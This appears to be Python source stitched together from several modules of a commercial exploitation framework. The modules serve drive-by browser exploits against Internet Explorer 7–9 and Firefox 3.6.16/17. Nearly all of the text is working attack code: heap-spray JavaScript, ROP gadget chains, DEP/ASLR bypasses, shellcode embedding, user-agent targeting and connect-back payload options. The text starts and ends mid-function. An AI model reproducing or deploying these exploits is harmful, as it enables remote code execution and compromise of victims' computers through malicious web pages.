heapspray; heapspray += unescape("DEPBYPASSCODE") + shellcode; try{ for(var i = 0; i < 400; i++) { memory[i]= heapspray.substring(0,heapspray.length); } } catch(err) {} """ script = script.replace( 'SHELLCODE', wp_urluencode(wp_randomnops(4) + self.shellcode + ("\x00" * 100))) script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode)) script = script.replace('DEPBYPASSCODE', wp_urluencode(depbypass)) #Obfuscate the script code (not used) filedata += script # Add the reset of the filedata filedata += """ </SCRIPT> <div style="position: absolute; top: -999px;left: -999px;"> <link href="css4.css" rel="stylesheet" type="text/css" /> </html> """ return filedata def makefileWinXP(self, browser): # Exploit for Windows XP (DEP Bypass) landingAddress = 0x126A1000 #0x126A1000 # Build our heapspray repeated block to get to this vtable jmp # 4384F78D 8B46 5C MOV EAX,DWORD PTR DS:[ESI+5C] # #43681BE1 8B49 20 MOV ECX,DWORD PTR DS:[ECX+20] #43681BE4 8B01 MOV EAX,DWORD PTR DS:[ECX] #43681BE6 8B50 20 MOV EDX,DWORD PTR DS:[EAX+20] #43681BE9 -FFE2 JMP EDX if browser == "MSIE 8.0": heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN heapspraycode += pack('<L', landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX] heapspraycode += pack('<L', 0x77C3335C) # FIRST STACK PTR (RETN 80) heapspraycode += pack('<L', 0x77C21A57) # Start the slide of RETN heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', 0x00000001) # required byte heapspraycode += pack('<L', 0x126A10FF) # To pass the TEST AL,AL heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', landingAddress + 4) # MOV ECX,DWORD PTR DS:[ECX+20] heapspraycode += pack( '<L', 0x77C15ED5 ) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP) heapspraycode += pack('<L', landingAddress) * 10 heapspraycode += pack('<L', 0x00000001) # required byte while len(heapspraycode) < (0x100 - 4): heapspraycode += pack('<L', 0x77C21A57) # 77C11110 RETN heapspraycode += pack('<L', 0x77C3335C) # RETN 80 else: heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN heapspraycode += pack('<L', landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX] heapspraycode += pack('<L', 0x77C3335C) # FIRST STACK PTR (RETN 80) heapspraycode += pack('<L', 0x77C21A57) # Start the slide of RETN heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', 0x00000001) # required byte heapspraycode += pack('<L', 0x126A10FF) # To pass the TEST AL,AL heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', landingAddress + 4) # MOV ECX,DWORD PTR DS:[ECX+20] heapspraycode += pack('<L', landingAddress) heapspraycode += pack( '<L', 0x77C15ED5 ) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP) while len(heapspraycode) < (0x100 - 4): heapspraycode += pack('<L', 0x77C21A57) # 77C11110 RETN heapspraycode += pack('<L', 0x77C3335C) # RETN 80 depbypass = pack('<L', 0x77C21A57) # RETN depbypass += pack('<L', 0x11111111) * 0x20 # Slackspace depbypass += self.wp_UniversalDEPBypassWinXP_VP( len(self.shellcode) + 8) filedata = """ <html> <script language="JavaScript"> """ #script code script = """ memory = new Array(); shellcode = unescape("SHELLCODE"); //var len= shellcode.length + 0x21; //0x21 is heap header var len=0 var heapspray = unescape("HEAPSPRAYCODE"); while(heapspray.length < 0x120000) heapspray += heapspray; heapspray = heapspray.substring(0, 0x120000- len); prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); heapspray = prefix + heapspray; heapspray += unescape("DEPBYPASSCODE") + shellcode; try{ for(var i = 0; i < 400; i++) { memory[i]= heapspray.substring(0,heapspray.length); } } catch(err) {} """ script = script.replace( 'SHELLCODE', wp_urluencode(wp_randomnops(4) + self.shellcode + ("\x00" * 100))) script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode)) script = script.replace('DEPBYPASSCODE', wp_urluencode(depbypass)) #Obfuscate the script code (not used) filedata += script # Add the reset of the filedata filedata += """ </SCRIPT> <div style="position: absolute; top: -999px;left: -999px;"> <link href="css4.css" rel="stylesheet" type="text/css" /> </html> """ return filedata def makefileIE7_part1(self): # Exploit for Windows Vista IE 7 # This page loads the .Net DLL # .Net DLL ASLR/DEP Bypass filedata = """ <html> <object classid="OURDLL#exploit.Shellcode" height="0" width="0"></object> <iframe src=/page2.htm></iframe> </html> """ filedata = filedata.replace('OURDLL', self.filename.replace('.html', '.dll')) return filedata def makefileIE7_part2(self): # Exploit for Windows Vista IE 7 # This part returns the created .net dll # .Net DLL ASLR/DEP Bypass p = PElib() filedata = p.createDotNETPEFileBuf(self.createShellcode(), self.pc) return filedata def makefileIE7_part3(self): # Exploit for Windows Vista IE 7 # This part triggers the exploit # .Net DLL ASLR/DEP Bypass landingAddress = 0x126A1000 #0x126A1000 # Build our heapspray repeated block to get to this vtable jmp # 4384F78D 8B46 5C MOV EAX,DWORD PTR DS:[ESI+5C] # #43681BE1 8B49 20 MOV ECX,DWORD PTR DS:[ECX+20] #43681BE4 8B01 MOV EAX,DWORD PTR DS:[ECX] #43681BE6 8B50 20 MOV EDX,DWORD PTR DS:[EAX+20] #43681BE9 -FFE2 JMP EDX heapspraycode = pack('<L', 0x77C21A57) #the slide of RETN heapspraycode += pack('<L', landingAddress + 8) # MOV EAX,DWORD PTR DS:[ECX] heapspraycode += pack('<L', landingAddress) # FIRST STACK PTR (RETN 80) heapspraycode += pack('<L', landingAddress) # Start the slide of RETN heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', 0x00000001) # required byte heapspraycode += pack('<L', 0x126A10FF) # To pass the TEST AL,AL heapspraycode += pack('<L', landingAddress) heapspraycode += pack('<L', landingAddress + 4) # MOV ECX,DWORD PTR DS:[ECX+20] heapspraycode += pack('<L', landingAddress) heapspraycode += pack( '<L', self.pc ) # MOV EDX,DWORD PTR DS:[EAX+20] JMP EDX (77C15ED5 XCHG EAX,ESP) while len(heapspraycode) < (0x100): heapspraycode += pack('<L', landingAddress) # Buffer filedata = """ <html> <script language="JavaScript"> """ #script code script = """ memory = new Array(); shellcode = unescape("SHELLCODE"); //var len= shellcode.length + 0x21; //0x21 is heap header var len=0 var heapspray = unescape("HEAPSPRAYCODE"); while(heapspray.length < 0x120000) heapspray += heapspray; heapspray = heapspray.substring(0, 0x120000- len); prefix = unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); prefix += unescape("%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111"); heapspray = prefix + heapspray; try{ for(var i = 0; i < 400; i++) { memory[i]= heapspray.substring(0,heapspray.length); } } catch(err) {} """ script = script.replace('HEAPSPRAYCODE', wp_urluencode(heapspraycode)) #Obfuscate the script code (not used) filedata += script # Add the reset of the filedata filedata += """ </SCRIPT> <div style="position: absolute; top: -999px;left: -999px;"> <link href="css4.css" rel="stylesheet" type="text/css" /> </html> """ return filedata def makefile(self, browser, osversion): if osversion == "Windows XP": self.log('WP> Serving Windows XP exploit') return self.makefileWinXP(browser) if browser == "MSIE 8.0": self.log('WP> Serving MSIE 8.0 exploit') return self.makefileIE8_VistaWin7_part1() if browser == "MSIE 7.0": self.log('WP> Serving MSIE 7.0 exploit') return self.makefileIE7_part1() # Default to a non ASLR version self.log('WP> Serving Non ASLR Exploit') return self.makefileWinXP(browser) def makecssfile(self, browser, osversion): #0x126A10C0 address = u"\u1000\u126a" filedata = "\xef\xbb\xbf" # UTF-8 Header Bytes filedata += """*{ color:red; color:blue; } @import url("\x01\x01ADDRESS"); @import url("css4.css"); @import url("css4.css"); @import url("css4.css");""".replace("ADDRESS", address.encode('utf-8')) return filedata def makesploit(self, clientheader, clientbody): self.createShellcode() # The main call from ClientD from libs.spkproxy import header, body h = header('SERVER') b = body() self.log('WP> ****************************************') self.log("WP> URL Received: %s" % clientheader.URL) user_agent = clientheader.getStrValue(['User-Agent']) cookies = clientheader.getStrValue(['Cookie']) # Get details browser, osversion = wp_browserinfo(user_agent) self.log('WP> OSVersion: %s' % osversion) self.log('WP> Browser: %s' % browser) self.log('WP> ') #self.log('WP> User agent of connecting host: %s' % user_agent) #self.log('WP> Cookies of connecting host: %s' % cookies) if clientheader.URL.count(self.filename): if cookies.count("SessionID"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" b.setBody(data) h.addHeader('Content-Type', 'text/html') else: self.log('WP> Serving exploit html file') data = self.makefile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.dll')): if browser == "MSIE 7.0": self.log('WP> Serving IE7 .Net DLL file') data = self.makefileIE7_part2() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'application/octet-stream') else: self.log('WP> Serving IE8 .Net DLL file') data = open( '3rdparty/White_Phosphorus/exploits/wp_quicktime_punk/ourdll.dll' ).read() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'application/octet-stream') elif (clientheader.URL.count('page2.htm')): if cookies.count("SessionID2"): self.log('WP> Exploit already sent to this client') self.log('WP> Returning blank page') data = "" b.setBody(data) h.addHeader('Content-Type', 'text/html') else: self.log('WP> Serving exploit secondary file') if browser == "MSIE 7.0": data = self.makefileIE7_part3() else: data = self.makefileIE8_VistaWin7_part2() if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') h.addHeader('Set-Cookie', 'SessionID2=%d' % self.jsObfuscator.getXORKey()) elif (clientheader.URL.count('.css')): self.log('WP> Serving exploit css file') data = self.makecssfile(browser, osversion) if not data: return None, None b.setBody(data) h.addHeader('Content-Type', 'text/html') else: self.log('WP> Redirecting to self') h.status = '302' h.addHeader('Location', self.filename) h.addHeader('Content-Type', 'text/html') self.log('WP> ****************************************') return h, b def run(self): if (self.version == 0): filedata = self.makefile('', 'Windows XP') elif (self.version == 1): filedata = self.makefile('MSIE 7', '') elif (self.version == 2): filedata = self.makefile('MSIE 8', '') self.log("WP> Opening %s" % (self.filename)) fd = file(self.filename, 'wb+') fd.write(filedata) fd.close() self.log('WP> Wrote to %s' % (self.filename)) return 1
class theexploit(httpclientside): def __init__(self): tcpexploit.__init__(self) httpclientside.__init__(self) self.searchMethod = self.FindBrowser_FindAnyTag_CmpExtraInfo self.UserAgent = [("Mozilla/", "Firefox", "")] self.plugin_info = None # we want clientd to give us a plugin dict self.supports_dns_mosdef = False self.shellcode = "\xcc" * 298 self.setVersions() self.version = 1 self.badstring = "" self.name = NAME self.filename = "".join( [ random.choice(string.uppercase) for x in range(8) ] ) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") def random_dummy_string(self, prefix=""): h = hashlib.new('sha1') h.update(str(random.random() * 10).replace('.', '')) retval = h.hexdigest() retval = '%s%.5s' % (prefix, retval) return retval # This is expecting an info_dict that is populated like so: # # info_dict['plugins'] = parse_plugin_data(plugins_dict) # info_dict['user_agent'] = clientheader.getStrValue(['User-Agent']) # # self.plugin_info comes from clientd in parse_plugin_data scrubbed format def is_vulnerable(self, info_dict): parsed = user_agent_parser.Parse(info_dict['user_agent']) if 'Windows' in parsed['os']['family'] and \ parsed['user_agent']['family'] == 'Firefox' and \ parsed['user_agent']['major'] == '3' and \ parsed['user_agent']['minor'] == '6' and \ parsed['user_agent']['patch'] in ('16', '17'): return 100 self.log("Did not detect vulnerable version of Firefox - bailing out.") return 0 def displayVersions(self): for v in self.versions.keys(): print "Version %d: %s" % (v, self.versions[v][0]) def setVersions(self): self.versions = {} #name, jmp esp, writeloc, writable, shelloc self.versions[1] = ("Windows - all versions", None) def neededListenerTypes(self): return self.clientSideListenerTypes() def makefile(self): replaces = {} replaces["[SHELLCODE]"] = urluencode(self.shellcode) filedata = """ <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Array.reduceRight</title> </head> <body> <script type="application/javascript"> """ js = """ var sprayed_chunks = []; var dom_elements_array = new Array(); var fake_strings_base = 0x0E000014; // a fake str block will be here var fake_strings_size = 0x00800000; //var dom_leak_address = 0x12200074; // start address to search for our tags and dom objs. var dom_leak_addresses = [0x12200074, 0x04900074, 0x08200074] // to search in 3 diff places var shellcode_base = 0x18000014; // a shellcode sprayed block will be here var search_tags = [0x66666666, 0x77777777, 0x11112222]; var search_str_tag = String.fromCharCode(0x6666) + String.fromCharCode(0x6666) + String.fromCharCode(0x7777) + String.fromCharCode(0x7777); var vtable_found = false; var dom_vtable_address = 0; var xul_version = null; var virtualalloc_ptr = 0; var gadget_1 = 0; var gadget_2 = 0; var gadget_3 = 0; var gadget_4 = 0; var gadget_5 = 0; var gadget_6 = 0; var gadget_7 = 0; var gadget_8 = 0; var gadget_9 = 0; reduceCallbackExploit = function(prev, current, index, array) { var o = current[0]; throw "<STOP REDUCECALLBACK>"; // just in case } reduceCallbackLeak = function(prev, current, index, array) { var offset = 0; var vtable_low = 0; if (xul_version == "1.9.2.16") { vtable_low = 0x000017B0; } else { if (xul_version == "1.9.2.17") { vtable_low = 0x0000C3E8; } } while (true) { var index = current.indexOf(search_str_tag, offset); if (index != -1) { var s1 = current.substr(index, 8); var leaked_info = []; for(var i=0; i < s1.length; i+=2) { high = new Number(s1.charCodeAt(i+1)); low = new Number(s1.charCodeAt(i)); data = (high << 16) + low; leaked_info.push(data); } // To find our DOM obj we search for two tags and make sure is NOT followd by the third search tag. // Also we make sure that the value that is supposed to be the vtable is greater than 0x20000000 because // sometimes we may get other kind of values there if ( leaked_info[0] == search_tags[0] && leaked_info[1] == search_tags[1] && leaked_info[2] != search_tags[2] ) { if ((leaked_info[3] & 0x0000FFFF) == vtable_low) { vtable_found = true; dom_vtable_address = leaked_info[3]; throw "<STOP REDUCECALLBACK>"; // exit } else { offset = index+160; } } else { // if we find the tags but not the vtable we keep searching adding to the offset offset = index+7950; } } else { throw "<STOP REDUCECALLBACK>"; // this is to stop reduceRight from keep calling the callback for other elements in the array } } } function trigger(address, explotar) { var boom = new Array(); // do some math to set the appropiate length to the array to access the given address value = address / 4 + 0x80000001; // For FF4 length value = ( (address - EAX) / 8 ) + 0x80000000 but EAX value is not fixed.. boom.length = value; try { if (explotar) boom.reduceRight(reduceCallbackExploit,0,0,0); else boom.reduceRight(reduceCallbackLeak,0,0,0); } catch(ex){ // an empty catch to get all the stop reduce exceptions we throw } } function str_hexa_pad4(str) { while (str.length < 4) str = "0" + str; return str.toUpperCase(); } function str_hexa_pad(str) { while (str.length < 8) str = "0" + str; return "0x" + str.toUpperCase(); } function str_hexa(val) { var str = new Number(val).toString(16); return str_hexa_pad(str); } function hexa(val) { var str = new Number(val).toString(16); return str_hexa_pad4(str); } function myescape(addr) { var str = ""; str = "%u" + hexa(addr & 0xffff) + "%u" + hexa((addr >> 16) & 0xffff); return unescape(str); } function create_fake_strings_block(block_size) { var str_block = ""; str_block += unescape("%uAAAA"); // padding to align for(var i=0; i < dom_leak_addresses.length; i++) { str_block += myescape(fake_strings_base + 0x8 + 0x10*i); // fake_strings_base points to this // It contians an address that ends with C so when using the mask to check the tagged js obj with 0x4 it interprets it as a valid string str_block += myescape(fake_strings_size); // fake string size to be able to read alot str_block += myescape(dom_leak_addresses[i]); // ptr to address I want to read (this is the fake str) str_block += myescape(0x12345678); //padding to create another fake str } while(str_block.length < block_size - 10){ str_block+=unescape("%uCCCC%u9090"); // this could be random... } return str_block; } function create_dummy_str_block(block_size) { var str_block = ""; //str_block += unescape("%uAAAA"); for(var j=0; j < 17; j++) { // some padding to place our search tags str_block += myescape(0xBADF00D0 + j); } // these 2 dwords are used as tags to search our dom objects to get a vtable str_block += myescape(search_tags[0]); str_block += myescape(search_tags[1]); while(str_block.length < block_size) { str_block += myescape(search_tags[2]); } return str_block; } function create_shellcode_block(block_size) { // rop chain needed based on xul.dll var block = ""; // set things to make a call to our stack pivot block += unescape("%uAAAA") // padding to align block += myescape(shellcode_base+0x4); // shellcode_base points here block += myescape(shellcode_base+0xC); block += myescape(gadget_2); // Gadget 2 - POP EAX; RET to load VirtualAlloc address block += myescape(shellcode_base+0x4C); // there must be 1 dword after the addres where this value points and then the first rop gadget block += myescape(virtualalloc_ptr); // ESP points here after gadget 1 block += myescape(gadget_3); // Gadget 3 - MOV EAX, [EAX]; RET block += myescape(gadget_4); // Gadget 4 - CALL EAX; RET // Parameters for virtualalloc block += myescape(0x0); // NULL block += myescape(0x10000); // size block += myescape(0x3000); // MEM_COMMIT | MEM_RESERVE block += myescape(0x40); // PAGE_EXECUTE_READWRITE block += myescape(gadget_5); // Gadget 5 - XCHG EDI,EAX; RET block += myescape(gadget_6); // Gadget 6 - set eax = edi ; set esi = shellcode - MOV EAX,EDI; POP ESI; RETN block += myescape(shellcode_base+0x5C); // Address where shellcode is block += myescape(gadget_7); // Gadget 7 - ecx = sizeof(shellcode) - POP ECX, RET block += myescape(0x1000); // sizeof(shellcode) block += myescape(gadget_8); // Gagdet 8 - memcpy - REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] block += myescape(0x11112222); // dummy block += myescape(0x33334444); // dummy block += myescape(gadget_9); // Gadget 9 - jmp to shellcode - JMP EAX block += myescape(0x55556666); // this will be shellcode_base+0x4C block += myescape(dom_vtable_address); // this addr right below will be in ECX and js3250!js_Interpret+0x48cf -> call ecx will use it to begin our RCE block += myescape(gadget_1); // Gadget 1 - Stack pivot - this content will be put in 0 by this very same gadget // 104CC407 56 PUSH ESI // 104CC408 5C POP ESP // 104CC409 8366 44 00 AND DWORD PTR DS:[ESI+44],0 // 104CC40D 33C0 XOR EAX,EAX // 104CC40F 5E POP ESI // 104CC410 C2 0400 RETN 4 // the vtable we are leaking is this one // const nsHTMLTextAreaElement::`vftable'{for `nsGenericHTMLElement'} dd offset nsHTMLTextAreaElement::QueryInterface(nsID const &,void * *) var shellcode = unescape("[SHELLCODE]"); block += shellcode; while(block.length < block_size - 10){ block+=unescape("%uCCCC%u9090"); // this could be random } return block; } function spray_str(str, quant){ var t = new Array(); for(var i=0; i < quant; i++){ t[i] += str; } return t; } function do_shellcode_spray() { setup_gadgets(); var spray = create_shellcode_block(0x7FFFF); sprayed_chunks.push(spray_str(spray,0x90)); } function do_fake_strings_spray() { // we want to leak the contents of the dom_leak_address address that will give us a vtable var spray = create_fake_strings_block(0x7FFFF); sprayed_chunks.push(spray_str(spray,0x80)); } function do_dummy_str_spray() { var spray = create_dummy_str_block(0x40); sprayed_chunks.push(spray_str(spray,1)); } function do_textarea_spray() { for(var a=0; a < 0x3000; a++) { var e = document.createElement("textarea"); dom_elements_array[a] = e; do_dummy_str_spray(); // this will put a mark between our dom objects and we'll use it to find the vtable } } function is_vulnerable() { var ua = navigator.userAgent; var ffregex = /Firefox\/3.6.1(6|7)/i; var xulregex = /; rv:(.*)\) /i; m = ffregex.exec(ua); if (m.length > 0) { m = xulregex.exec(ua); if (m.length > 1) { xul_version = m[1]; return true; } } return false; } function setup_gadgets() { if (xul_version == "1.9.2.16") { virtualalloc_ptr = dom_vtable_address-0x1A9524; gadget_1 = dom_vtable_address-0x51F0C0; gadget_2 = dom_vtable_address-0x9DEDDB; gadget_3 = dom_vtable_address-0x9DD6A2; gadget_4 = dom_vtable_address-0x8DF1BD; gadget_5 = dom_vtable_address-0x9BF3F4; gadget_6 = dom_vtable_address-0x9C9CCF; gadget_7 = dom_vtable_address-0x9E063D; gadget_8 = dom_vtable_address-0x9DF973; gadget_9 = dom_vtable_address-0x9DD304; } else { if (xul_version == "1.9.2.17") { virtualalloc_ptr = dom_vtable_address-0x1A6164; gadget_1 = dom_vtable_address-0x51FFE1; gadget_2 = dom_vtable_address-0x9E9A72; gadget_3 = dom_vtable_address-0x9E890C; gadget_4 = dom_vtable_address-0x8D7FA5; gadget_5 = dom_vtable_address-0x8AE69F; gadget_6 = dom_vtable_address-0x9D273F; gadget_7 = dom_vtable_address-0x9EB35B; gadget_8 = dom_vtable_address-0x9EA2C1; gadget_9 = dom_vtable_address-0x98F16E; } else { throw "Browser not supported"; } } } function search_vtable() { var x = 0; while ( (x < dom_leak_addresses.length) && (!vtable_found) ) { trigger(fake_strings_base + 0x10*x, false); x++; } } function Exploit() { if (is_vulnerable()) { do_fake_strings_spray(); // some strings to read with the leak do_textarea_spray(); // some DOM objects to get their vtable ref search_vtable(); if (vtable_found) { do_shellcode_spray(); trigger(shellcode_base, true); // trigger the RCE } else { document.write("Failed..."); } } else { document.write("Browser not supported"); } } setTimeout("Exploit();", 1000); """ for k,v in replaces.iteritems(): js = js.replace(k,v) #filedata += self.jsObfuscator.obfuscate(js) filedata+=js filedata += """ </script> </body> </html>""" return filedata def makesploit(self,clientheader,clientbody): """ Construct the attack """ h = header("SERVER") b = body() self.log("Request: " + clientheader.URL) if clientheader.URL.count(self.filename): #the exploit self.log("sending HTML") self.createShellcode() sploitstring = self.makefile() b.setBody(sploitstring) h.addHeader('Set-Cookie', 'SessionID=%d' % self.jsObfuscator.getXORKey()) h.addHeader("Content-Type", "text/html") else: #redirect to self self.log("redirecting to self") h.status = "302" h.addHeader("Location", self.filename) h.addHeader("Content-Type", "text/html") return h, b
class theexploit(wp_exploit, httpclientside): PAYLOADS = ["IE Inject Connect Back", "Execute Command"] DEFAULT_PAYLOAD = 0 def __init__(self): wp_exploit.__init__(self) httpclientside.__init__(self) self.setInfo(DESCRIPTION) self.setInfo(VERSION) self.name = NAME self.targets = targets self.version = 0 self.isClientD = False self.use_universal = True self.encode_printable = True self.alignstack = True self.badstring = "\x00\x09\x0a\x0b\x0c\x0d\x22\x5c" self.filename = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.filename2 = "".join( [random.choice(string.uppercase) for x in range(8)]) + ".html" self.jsObfuscator = JSObfuscator() self.jsObfuscator.xorKeyFromCookie("SessionID") return def is_vulnerable(self, info_dict): """ Check for IE """ self.isClientD = True if "MSIE" in info_dict['user_agent']: self.log("WP> Target has MSIE") language = info_dict['plugins'].get("language", "") if type(language) == type([]): language = language[0] self.log("WP> language found: %s" % language) if "en-us" in language: return 95 else: return 20 return 0 def usage(self): self.wp_usage(targets, "-F <filename>") return def neededListenerTypes(self): self.getArgs() return self.wp_createWin32Listener() def createShellcode(self): self.getArgs() self.log('WP> Targeting version %d: %s' % (self.version, targets[self.version][0])) return self.wp_createShellcode() def getArgs(self): if getattr(self, 'useSSLMOSDEF', False): self.isClientD = True self.DEFAULT_PAYLOAD = 1 else: if self.HTTPMOSDEF: if self.useSSLMOSDEF: self.DEFAULT_PAYLOAD = 1 else: self.DEFAULT_PAYLOAD = 2 self.wp_getShellcodeType() if self.target: self.host = self.target.interface self.filename = self.argsDict.get('filename', self.filename) return def displayVersions(self): for t in targets.keys(): print 'WP> Version %d: %s' % (t, targets[t][0]) return def makefile(self, browser, osversion): if osversion == "Windows XP": if browser == "MSIE 8.0": self.log('WP> Serving Windows XP IE8 exploit') return self.makefileIE8_XP() if osversion == "Windows 7": if browser == "MSIE 8.0": self.log('WP> Serving MSIE 8.0 exploit') return self.makefileIE8_W7Vista() if browser == "MSIE 9.0": self.log('WP> Serving MSIE 9.0 exploit') return self.makefileIE9_W7Vista() if osversion == "Windows Vista": if browser == "MSIE 7.0": self.log('WP> Serving MSIE 7.0 exploit') return self.makefileIE7_Vista() if browser == "MSIE 8.0": self.log('WP> Serving MSIE 8.0 exploit') return self.makefileIE8_W7Vista() if browser == "MSIE 9.0": self.log('WP> Serving MSIE 9.0 exploit') return self.makefileIE9_W7Vista() self.log('WP> Invalid target') return def makefileIE7_Vista(self): payload = "\x8B\xE0" # MOV ESP,EAX payload += "\x83\xC4\x11" # ADD ESP,11 payload += self.shellcode payload += wp_randomstring((5120 - len(payload))) filedata = """<html> <head> <script>""" script = wp_clientside_HeapLib(padding="%u0c0c") script += """ var heap_obj = new heapLib.ie(0x20000); var nops = unescape("NOPS"); var code = unescape("SHELLCODE"); while (nops.length < 0x2000) nops += nops; var offset = nops.substring(0, 0x5FA); var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length); while (shellcode.length < 0x82000) shellcode += shellcode; var block = shellcode.substring(0, (0x82000-6)/2); heap_obj.gc(); for (var z=1; z < 0x300; z++) { heap_obj.alloc(block); } """ script = script.replace('SHELLCODE', wp_urluencode(payload)) script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c))) # Obfuscate the script code (disabled for this exploit) self.isClientD = False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script # Add the reset of the filedata filedata += """</script> <body> <script> var arrr = new Array(); arrr[0] = window.document.createElement("img"); arrr[0]["src"] = "%s"; </script> <iframe src="%s"></iframe> </body> </html> """ % (wp_randomstring(1), self.filename2) return filedata def makefileIE8_W7Vista(self): payload = pack('<L', 0x7C343BD9) # ret payload += pack('<L', 0x7C343BD8) # pop edx payload += pack('<L', 0x7C348B05) # xchg eax, esp payload += self.wp_sayonaraASLRDEPBypass(len(self.shellcode) + 8) payload += self.shellcode payload += wp_randomstring((5120 - len(payload))) filedata = """<html> <head> <script>""" script = wp_clientside_HeapLib(padding="%u0c0c") script += """ var heap_obj = new heapLib.ie(0x20000); var nops = unescape("NOPS"); var code = unescape("SHELLCODE"); while (nops.length < 0x2000) nops += nops; var offset = nops.substring(0, 0x5F4); var shellcode = offset + code + nops.substring(0, 0x1000-code.length-offset.length); while (shellcode.length < 0x80000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < 0x300; z++) { heap_obj.alloc(block); } """ script = script.replace('SHELLCODE', wp_urluencode(payload)) script = script.replace('NOPS', wp_urluencode(pack('<L', 0x0c0c0c0c))) # Obfuscate the script code (disabled for this exploit) self.isClientD = False if self.isClientD: self.log("WP> Running jsObfuscator") filedata += self.jsObfuscator.obfuscate(script) else: filedata += script # Add the reset of the filedata filedata += """</script> <body> <script> var arrr = new Array(); arrr[0] = window.document.createElement("img"); arrr[0]["src"] = "%s"; </script> <iframe src="%s"></iframe> </body> </html> """ % (wp_randomstring(1), self.filename2) return filedata def makefileIE9_W7Vista(self): payload = pack('<L', 0x0c0c0c0c) payload += pack('<L', 0x7C343BD9) # ret payload += pack('<L', 0x7C343BD8) # pop edx payload += pack('<L', 0x7C348B05) # xchg eax, esp payload += self.wp_sayonaraASLRDEPBypass(len(self.shellcode) + 8) payload += self.shellcode payload += wp_randomstring((5120 - len(payload))) filedata = """<html> <head> <script>""" script = wp_clientside_HeapLib(padding="%u0c0c") script += """ function randomblock(blocksize){ var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x20000); var nops = unescape("NOPS"); var code = unescape("SHELLCODE"); while (nops.length < 0x80000) nops += nops; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x2000))); while (padding.length < 0x2000) padding+= padding; var junk_offset = padding.substring(0, 0x5FC); var single_sprayblock = junk_offset + code + nops.substring(0, 0x1000 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } """ script = script.replace('SHELLCODE', wp_urluencode(payload)) 